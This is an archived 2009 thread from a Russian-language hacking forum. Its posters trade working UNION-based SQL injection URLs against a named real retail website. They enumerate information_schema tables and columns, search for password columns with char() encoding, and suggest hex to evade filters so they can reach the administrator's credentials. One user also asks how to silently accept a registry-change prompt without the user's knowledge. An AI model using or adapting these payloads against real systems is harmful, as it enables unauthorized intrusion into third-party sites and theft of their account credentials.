ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
23.01.2009, 22:53
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715
Репутация:
90
|
|
kevmen
переведи свой запрос, у тебя получается вывести названия строк где имя строки char(97 ,100,100,101,100,114,101,113,117,101,115,116,115), а тебе надо вывести названия строк, где имя таблицы char(97 ,100,100,101,100,114,101,113,117,101,115,116,115)
http://localhost/view_cat.php?cat=-1+union+select+1,column_name,3,4,5,6,7,8,9+from+in formation_schema.columns+where+table_name=char(97 ,100,100,101,100,114,101,113,117,101,115,116,115)+ limit+1,1
|
|
|
23.01.2009, 22:53
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889
Репутация:
60
|
|
jokester,спасибо)Опять ступил
|
|
|
|
23.01.2009, 22:58
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038
Репутация:
9
|
|
http://www.technodom.kz/index.php?go=news&news=1+union+select+1,table_name ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+inf ormation_schema.tables+limit+80,1000&q=wNW616thoUB WHv3
Помогите найти админские таблицы, плз, запарился уже...
В Users админа нет...
Последний раз редактировалось Gemini12; 23.01.2009 в 23:00..
|
|
|
|
23.01.2009, 23:10
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715
Репутация:
90
|
|
Сообщение от Gemini12
Помогите найти админские таблицы, плз, запарился уже...
В Users админа нет...
попробуй составить запрос типа http://www.technodom.kz/index.php?go=news&news=1+union+select+1,table_name ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+inf ormation_schema.columns+where+column_name+like+cha r(37,112,97,115,115,37)&q=wNW616thoUBWHv3
запрос типа вывести все строки, где имеется словосочетание pass, попробуй вместо pass подставить login, name итд...
|
|
|
|
23.01.2009, 23:22
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038
Репутация:
9
|
|
Сообщение от pinky07
попробуй составить запрос типа http://www.technodom.kz/index.php?go=news&news=1+union+select+1,table_name ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+inf ormation_schema.columns+where+column_name+like+cha r(37,112,97,115,115,37)&q=wNW616thoUBWHv3
запрос типа вывести все строки, где имеется словосочетание pass, попробуй вместо pass подставить login, name итд...
Не выходит 
Скорее всего админ хранит пассы в другой бд, кто знает подскажите как определить в какой и как туда попасть?
|
|
|
|
23.01.2009, 23:27
|
|
Новичок
Регистрация: 23.01.2009
Сообщений: 11
Провел на форуме:
60789
Репутация:
0
|
|
Всем привет!
Я чайник, даже самовар  большая просьба ко всем кто в курсе, ответить
Можно ли сделать так, что во время появления на экране окошка с предложением изменения реестра да - нет, запустить программу, которая сама нажмёт кнопку да, как только появиться это окно проще говоря, чтобы запись в реестр проходила без запроса у пользователя.
Можно так или нет? Если да то как?? |
|
|
|
23.01.2009, 23:29
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889
Репутация:
60
|
|
Gemini12,попробуй выведи все таблицы сиптом)может найдешь что-нибудь )
|
|
|
|
23.01.2009, 23:31
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889
Репутация:
60
|
|
Neponomat,если бы так можно было,тогда зачем фаэрволы?зачем нам надежные браузеры!
|
|
|
|
23.01.2009, 23:38
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715
Репутация:
90
|
|
Сообщение от Gemini12
Не выходит
Скорее всего админ хранит пассы в другой бд, кто знает подскажите как определить в какой и как туда попасть? попробуй так
http://www.technodom.kz/index.php?go=news&news=1+union+select+1,table_sche ma,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18+from+information_schema.co l umns+where+table_name=COLLATIONS&q=wNW616thoUBWHv3
table_name=любая стандартная таблица
должна вывести имя бд где находиться стандартная таблица COLLATIONS,
P.s если есть фильтры имя таблицы напиши в hex'e
Последний раз редактировалось pinky07; 23.01.2009 в 23:41..
|
|
|
|
23.01.2009, 23:39
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
pinky07,
Ты с ума сошёл? Ты сейчас его только запутаешь...
Gemini12,
Ничего кроме users не нашел, видимо, не судьба.
Последний раз редактировалось R1dex; 24.01.2009 в 00:01..
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
